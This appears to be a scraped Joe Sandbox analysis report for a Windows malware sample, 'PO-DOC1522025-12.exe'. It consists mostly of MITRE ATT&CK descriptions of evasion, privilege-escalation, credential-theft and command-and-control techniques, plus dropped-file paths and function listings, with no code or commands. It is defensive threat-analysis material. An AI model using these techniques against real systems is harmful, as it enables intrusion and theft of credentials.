Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-DOC1522025-12.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\turbinate

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
PO-DOC1522025-12.exe

Function 001442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 001442A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00182BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00142CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0018065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0014344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00142B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00143170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 00F4CF30 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00142C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00F4CD10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 142
fileCOMMON

Function 00143B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 00F4BC00 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00143923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre